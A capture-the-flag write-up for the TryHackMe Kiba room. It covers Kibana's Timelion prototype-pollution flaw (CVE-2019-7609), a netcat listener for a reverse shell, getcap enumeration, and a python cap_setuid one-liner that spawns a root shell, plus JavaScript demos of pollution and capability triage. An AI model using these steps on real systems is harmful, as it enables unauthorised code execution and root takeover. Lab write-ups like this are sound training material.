KIBA WriteUp Tryhackme

TASK 1: Flags

#1 — What is the vulnerability that is specific to programming languages with prototype-based inheritance?

Answer: do some research on languages with prototype-based inheritance (JavaScript is the obvious one) and you will find it: prototype pollution.

#2 — What is the version of visualization dashboard installed in the server?

Browse to http://10.10.113.146:5601 and open "Management". The Kibana version is shown in the top left corner of that page. The same value is returned by the status API at http://10.10.113.146:5601/api/status (the version.number field), which is handy when you want it from the command line.

#3 — What is the CVE number for this vulnerability? This will be in the format: CVE-0000–0000

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute JavaScript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

Answer: that paragraph is the advisory text for the flaw; search for it and you will land on the CVE ID (CVE-2019-7609).
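The bug class behind both answers above, as an added example (not code from the original post or from Kibana): a helper that sets a property by a user-supplied dotted path, which is how prototype pollution usually enters a Node.js application, next to a hardened version. The Timelion flaw was an instance of this pattern: a user-controlled property path walked up to Object.prototype, after which values the Node process later read were attacker-controlled. The function and variable names here are illustrative, and the attacker path in demonstrate() is constructed.

```javascript
// Prototype pollution: an unguarded "set property by dotted path" helper versus a hardened one.
// Added example for this write-up, not Kibana's code; setPathUnsafe/setPathSafe are illustrative names.

// Vulnerable: walks whatever path the caller supplies. Every plain object inherits from
// Object.prototype, so a path starting with "__proto__" (or "constructor.prototype") climbs
// to the shared prototype and writes there, and every object in the process "has" the
// attacker's property from then on.
function setPathUnsafe(target, path, value) {
  const keys = path.split('.');
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Hardened: reject the keys that reach a prototype, and only descend into the target's own
// properties so an inherited name such as "toString" can never be used as a stepping stone.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function setPathSafe(target, path, value) {
  const keys = path.split('.');
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) throw new Error(`refusing to traverse key "${k}"`);
  }
  let cur = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    const own = Object.prototype.hasOwnProperty.call(cur, k);
    if (!own || typeof cur[k] !== 'object' || cur[k] === null) cur[k] = {};
    cur = cur[k];
  }
  cur[keys[keys.length - 1]] = value;
  return target;
}

// Constructed attacker input: a property path of the shape a user could feed to any API that
// builds objects from request parameters. Returns what an unrelated object looks like before
// and after the write, and whether the hardened helper stopped it.
function demonstrate() {
  const attackerPath = '__proto__.polluted';
  const before = ({}).polluted;              // undefined: nothing on Object.prototype yet
  setPathUnsafe({}, attackerPath, 'owned');
  const after = ({}).polluted;               // 'owned': a brand-new object inherits it
  delete Object.prototype.polluted;          // undo the pollution for the rest of the process

  let blocked = false;
  try {
    setPathSafe({}, attackerPath, 'owned');
  } catch (e) {
    blocked = true;                          // the hardened helper rejects the path outright
  }
  return { before, after, blocked, stillClean: ({}).polluted === undefined };
}

console.log(demonstrate());
```

The important observation is the `after` value: the attacker never touched the object being inspected, yet it now carries the injected property, because the write landed on the prototype that every object shares. Deny-listing `__proto__`, `constructor` and `prototype` is the minimum; creating lookup objects with `Object.create(null)` so they have no prototype at all removes the path entirely.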

#4 — Compromise the machine and locate user.txt

Clone the public exploit for this CVE (the original post links the repository here).

Start a listener (nc -nvlp 4444) and run the exploit against the target:

Now we have the shell:

Once you cat user.txt you will get the user flag.

#5 — Capabilities are a Linux security mechanism that "divides" root privileges into distinct values, so a binary can be granted one piece of root's power (for example, the ability to change its UID) without being setuid root.

Answer: No answer required

#6 — How would you recursively list all of these capabilities?

Answer: getcap -r / (add 2>/dev/null to hide the permission-denied noise from directories you cannot read)

#7 — Escalate privileges and obtain root.txt

Checking file capabilities reveals a custom python3 binary in /home/kiba/.hackmeplease/ that carries the cap_setuid capability:

Checking GTFOBins for python under its Capabilities section shows that a python binary with cap_setuid can call setuid(0) and spawn a root shell:
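The enumeration step and the GTFOBins lookup above, as an added example (not from the room, GTFOBins or the original post): a small Node script that parses getcap -r / output in both formats libcap prints, flags the capabilities that are directly abusable for privilege escalation, records whether the capability is in the Effective set (the +ep form the one-liner relies on), and builds the python setuid one-liner for the case found on this box. The getcap lines embedded in it are constructed, not copied from the target; the function names and the DANGEROUS table are mine.

```javascript
// Triage of `getcap -r / 2>/dev/null` output: parse each line and flag capabilities that
// let a binary change identity or bypass file permissions outright.
// Added example for this write-up; not from the room or GTFOBins. SAMPLE_GETCAP is constructed.

// Capabilities worth a second look, with what an attacker does with each (illustrative table).
const DANGEROUS = {
  cap_setuid: 'setuid(0) then spawn a shell (GTFOBins python one-liner)',
  cap_setgid: 'switch to any group, usually combined with cap_setuid',
  cap_dac_override: 'bypass file permission checks (write /etc/passwd or /etc/shadow)',
  cap_dac_read_search: 'read any file on the system (shadow, private keys)',
  cap_sys_admin: 'mount filesystems and other escape paths',
  cap_sys_ptrace: 'attach to and inject into root processes',
  cap_sys_module: 'load kernel modules',
  cap_chown: 'change ownership of any file',
  cap_fowner: 'bypass ownership checks on chmod and friends',
};

// Constructed sample. Older libcap prints "path = caps", newer libcap prints "path caps".
const SAMPLE_GETCAP = `
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet cap_net_raw=ep
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
`;

// Parse one getcap line into { path, caps, effective, raw }; null for anything else.
function parseGetcapLine(line) {
  const m = line.trim().match(/^(.+?)\s+(?:=\s+)?(cap_\S+)$/);
  if (!m) return null;
  const raw = m[2];                                   // e.g. "cap_setuid+ep" or "cap_net_raw=ep"
  const parts = raw.split(/[+=]/);                    // names first, flag letters last
  const caps = parts[0].split(',').map((s) => s.trim().toLowerCase()).filter(Boolean);
  const effective = parts[parts.length - 1].includes('e');  // "+p" alone is not enough
  return { path: m[1], caps, effective, raw };
}

// Walk the whole output and keep only entries that carry a dangerous capability.
function triageGetcap(output) {
  const findings = [];
  for (const line of output.split('\n')) {
    const entry = parseGetcapLine(line);
    if (!entry) continue;
    // hasOwnProperty rather than `in`, so a capability named like an inherited property
    // (the same prototype issue as question #1) cannot produce a false hit.
    const hits = entry.caps.filter((c) => Object.prototype.hasOwnProperty.call(DANGEROUS, c));
    if (hits.length === 0) continue;
    findings.push({
      path: entry.path,
      caps: hits,
      effective: entry.effective,
      why: hits.map((c) => DANGEROUS[c]),
    });
  }
  return findings;
}

// The GTFOBins capability entry for python, parameterised on the binary that carries cap_setuid.
function pythonSetuidCommand(path) {
  return `${path} -c 'import os; os.setuid(0); os.system("/bin/bash")'`;
}

for (const f of triageGetcap(SAMPLE_GETCAP)) {
  console.log(`${f.path}: ${f.caps.join(',')} (effective: ${f.effective})`);
  for (const w of f.why) console.log(`  -> ${w}`);
  if (f.caps.includes('cap_setuid') && /python/.test(f.path)) console.log(`  try: ${pythonSetuidCommand(f.path)}`);
}
```

On a real target, replace SAMPLE_GETCAP with the output of `getcap -r / 2>/dev/null` (or read process.stdin). A binary that only has the capability in the Permitted set (+p) will not be flagged as effective; the python one-liner assumes +ep, which is what the custom python3 here has.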

Upgrade to a proper interactive shell and grab the root flag. The original post links a site of one-liner payloads and a GitHub repository of reverse shells for this step.

Submit the flags.

--

Ayush Bagde
e-JPT | MTA Security Fundamentals | Ethical Hacker Trainer | Cyber Crime Intervention Officer | Cybersecurity Researcher